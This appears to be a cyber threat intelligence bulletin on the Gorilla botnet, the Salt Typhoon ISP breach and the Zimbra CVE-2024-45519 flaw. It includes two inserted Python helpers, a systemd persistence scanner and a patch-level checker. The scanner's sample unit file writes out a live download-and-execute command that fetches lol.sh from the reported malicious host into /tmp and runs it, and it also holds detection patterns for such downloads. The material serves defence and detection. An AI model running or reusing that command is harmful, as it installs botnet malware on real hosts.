Ankura CTIX FLASH Update - October 8, 2024

Ransomware/Malware Activity

New Gorilla Botnet Issues Over 300,000 DDoS Attacks

Cybersecurity researchers have identified a new botnet family called “Gorilla Botnet” that was particularly active throughout September. The botnet issued over 300,000 attack commands targeting more than 100 countries, although most of the attacks were directed at the U.S., China, Canada, and Germany. Targets allegedly included universities, governments, telecommunications companies, banks, and the gaming industry. Researchers determined that the botnet relied heavily on User Datagram Protocol (UDP) floods as its preferred attack method, followed by ACK Bypass Flood and VSE Flood methods.

The botnet can carry out many different types of attacks and uses encryption algorithms similar to those employed by the Keksec group to hide key information, suggesting that the attackers behind this campaign could be related to Keksec. Examination of Gorilla Botnet’s source code indicates that it appears to be a variant of the leaked Mirai botnet. The bot malware supports multiple CPU architectures, connects to one of five predefined command-and-control (C2) servers, and embeds functions to exploit a security flaw in Apache Hadoop YARN RPC to achieve remote code execution.

The botnet maintains persistence by creating a service file named “custom.service” in the “/etc/systemd/system/” directory, configured to run automatically at system startup. This service downloads a shell script, “lol.sh”, from the remote server “pen[.]gorillafirewall[.]su” into the “/tmp/” directory, sets execute permissions on it, and runs it. Denial-of-service attacks continue to be one of the most prevalent cybersecurity threats. CTIX analysts recommend that organizations implement controls to mitigate the risk posed by DoS attacks. CTIX analysts will continue to report on new and emerging forms of malware and associated campaigns.
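The persistence mechanism described above is simple to hunt for on a Linux host. The following Python script is an added example, not code from the report or from any vendor: it scans systemd unit text for Exec lines that fetch a script from a remote host or reference a file in a temp directory, using the service name and staging host named above as indicators (the host is written un-defanged so the check can match it). The sample unit files are constructed inline.

```python
import re

# Indicators from the report: unit name and staging host (defanged in the text,
# written plain here so the check can match it).
KNOWN_SERVICE_NAMES = {"custom.service"}
KNOWN_HOSTS = {"pen.gorillafirewall.su"}

EXEC_RE = re.compile(r"^\s*Exec(?:Start|StartPre|StartPost)\s*=\s*(.+)$", re.MULTILINE)
DOWNLOAD_RE = re.compile(r"\b(?:wget|curl)\b.*?https?://([^/\s'\"]+)", re.IGNORECASE)
TMP_PATH_RE = re.compile(r"(?:^|[\s;&|'\"=])/(?:tmp|var/tmp|dev/shm)/\S+")

# Constructed sample units: one mimicking the persistence described above,
# one benign. Real hunting would read every *.service under /etc/systemd/system.
SAMPLE_UNITS = {
    "/etc/systemd/system/custom.service": (
        "[Unit]\nDescription=custom\n[Service]\nType=simple\n"
        "ExecStart=/bin/sh -c 'wget -q http://pen.gorillafirewall.su/lol.sh "
        "-O /tmp/lol.sh; chmod +x /tmp/lol.sh; /tmp/lol.sh'\n"
        "[Install]\nWantedBy=multi-user.target\n"
    ),
    "/etc/systemd/system/nginx.service": (
        "[Unit]\nDescription=nginx\n[Service]\n"
        "ExecStart=/usr/sbin/nginx -g 'daemon off;'\n"
        "[Install]\nWantedBy=multi-user.target\n"
    ),
}


def scan_unit(path: str, text: str) -> list:
    """Return the reasons (possibly none) a unit file looks like Gorilla-style persistence."""
    reasons = []
    if path.rsplit("/", 1)[-1] in KNOWN_SERVICE_NAMES:
        reasons.append("unit name matches reported indicator")
    for cmd in EXEC_RE.findall(text):
        m = DOWNLOAD_RE.search(cmd)
        if m:
            reasons.append(f"Exec line downloads from {m.group(1)}")
            if m.group(1).lower() in KNOWN_HOSTS:
                reasons.append("download host is the reported Gorilla staging host")
        if TMP_PATH_RE.search(cmd):
            reasons.append("Exec line references a path in a world-writable temp directory")
    return reasons


def scan_units(units: dict) -> dict:
    """Map unit path -> reasons, keeping only suspicious units."""
    return {p: r for p, t in units.items() if (r := scan_unit(p, t))}


if __name__ == "__main__":
    for path, reasons in scan_units(SAMPLE_UNITS).items():
        print(path, "->", "; ".join(reasons))
```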

Threat Actor Activity

Chinese Hackers Breach Broadband Providers to Target U.S. Government's Wiretap System 

As an update to our September 27 Flash Threat Actor report, more recent developments have revealed that the Chinese hacking group “Salt Typhoon” breached the networks of major U.S. broadband providers, including Verizon, AT&T, and Lumen Technologies. The hackers allegedly accessed systems used by the U.S. federal government for court-authorized wiretaps, potentially maintaining this access for months to collect intelligence. The Wall Street Journal, citing anonymous sources, reported the breach and noted that the hackers might have engaged in extensive data collection from internet service providers serving millions of Americans. 

Salt Typhoon, also known as Earth Estries and Ghost Emperor, has been active since at least 2019. The group typically targets government entities and telecommunications companies, primarily in Southeast Asia, but has also attacked organizations across multiple countries, including Brazil, Canada, and the UK. The group's sophisticated methods often involve exploiting vulnerabilities in software, such as the ProxyLogon flaws in Microsoft Exchange Server, and deploying custom backdoors and rootkits. The U.S. government and private sector security experts are actively investigating the breach's impact, including the type and volume of data accessed. 

This incident is part of a broader pattern of cyber espionage by Chinese state-backed actors targeting U.S. and European networking devices and ISPs. Notably, these groups often share infrastructure and tools, indicating coordinated efforts under a common umbrella. Despite the serious implications, Chinese authorities have dismissed the allegations, accusing the U.S. of fabricating narratives to blame China. The ongoing investigation seeks to determine the initial access method used by the hackers, with Cisco routers being one potential vector under scrutiny, though no direct evidence has yet implicated Cisco equipment in the breach. CTIX analysts will continue reporting on ongoing activity among threat actors.

Vulnerabilities

CISA Adds Critical Synacor Zimbra Vulnerability to the Known Exploited Vulnerabilities Catalog 

The Zimbra Collaboration platform is currently facing active exploitation attempts targeting a critical vulnerability, allowing unauthenticated attackers to execute arbitrary commands through a flaw in its postjournal service. Discovered by researcher Alan Li and assigned a CVSS score of 10, the vulnerability, tracked as CVE-2024-45519, was addressed in Zimbra’s September 2024 updates for versions 8.8.15 Patch 46, 9.0.0 Patch 41, 10.0.9, and 10.1.1. The attacks began on September 28, 2024, after Project Discovery disclosed technical details and proof-of-concept (PoC) exploit code. 

Threat actors exploit the flaw by sending spoofed Gmail emails with Base64-encoded commands in the CC fields, which Zimbra servers parse and execute. This approach has been used to deploy web shells on vulnerable servers, allowing further control and execution of commands. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has since added the flaw to its Known Exploited Vulnerabilities (KEV) catalog, citing the risk it poses to federal and private systems. CISA has mandated that all Federal Civilian Executive Branch (FCEB) agencies remediate the issue by no later than October 24, 2024, and recommends private organizations apply the patches as well. While the attacks are ongoing, the responsible threat actors remain unidentified. For systems where immediate patching is not feasible, temporarily removing the postjournal service has been suggested to mitigate potential risks. CTIX analysts recommend that affected users follow the guidance in the KEV to prevent exploitation. 
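Checking which installs still need the patch can be automated against an inventory of recorded Zimbra versions. The following Python helper is an added example, not Zimbra's or the report's own code: it compares a version string against the first fixed release of each branch listed above, returns None for branches the report does not cover, and assumes version strings are recorded in one of the spellings shown in the comment.

```python
import re

# First fixed release per branch, from the report: 8.8.15 Patch 46, 9.0.0 Patch 41,
# 10.0.9 and 10.1.1. Keyed by (major, minor) branch; value is (release, patch level).
FIXED_BY_BRANCH = {
    (8, 8): ((8, 8, 15), 46),
    (9, 0): ((9, 0, 0), 41),
    (10, 0): ((10, 0, 9), 0),
    (10, 1): ((10, 1, 1), 0),
}

# Accepted spellings (an assumption about how inventories record versions):
# "8.8.15 Patch 46", "8.8.15_P46", "9.0.0 P41", "10.0.9".
VERSION_RE = re.compile(
    r"^\s*(\d+)\.(\d+)\.(\d+)(?:[\s_]*(?:Patch\s*|P)(\d+))?\s*$", re.IGNORECASE
)


def parse_version(text: str):
    """Return ((major, minor, build), patch_level) or raise ValueError."""
    m = VERSION_RE.match(text)
    if not m:
        raise ValueError(f"unrecognised Zimbra version string: {text!r}")
    release = tuple(int(x) for x in m.group(1, 2, 3))
    patch = int(m.group(4)) if m.group(4) else 0
    return release, patch


def is_vulnerable(text: str):
    """True if below the first fixed release of its branch, False if at or above it,
    None if the branch is not one the advisory lists (no claim is made for those)."""
    release, patch = parse_version(text)
    fixed = FIXED_BY_BRANCH.get(release[:2])
    if fixed is None:
        return None
    return (release, patch) < fixed


if __name__ == "__main__":
    for v in ["8.8.15 Patch 45", "8.8.15_P46", "9.0.0 P41", "10.0.8", "10.1.1", "10.2.0"]:
        print(v, "->", {True: "needs patch", False: "fixed", None: "branch not covered"}[is_vulnerable(v)])
```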

The semi-weekly Ankura Cyber Threat Investigations and Expert Services (CTIX) FLASH Update is designed to provide timely and relevant cyber intelligence about current or emerging cyber events. The preceding is a collection of cyber threat intelligence leads assembled over the past few days and typically includes high-level intelligence about recent threat group/actor activity and newly identified vulnerabilities impacting a wide range of industries and victims. Please feel free to contact the CTIX Team (ctix@ankura.com) if you need more context.

© Copyright 2024. The views expressed herein are those of the author(s) and not necessarily the views of Ankura Consulting Group, LLC., its management, its subsidiaries, its affiliates, or its other professionals. Ankura is not a law firm and cannot provide legal advice.
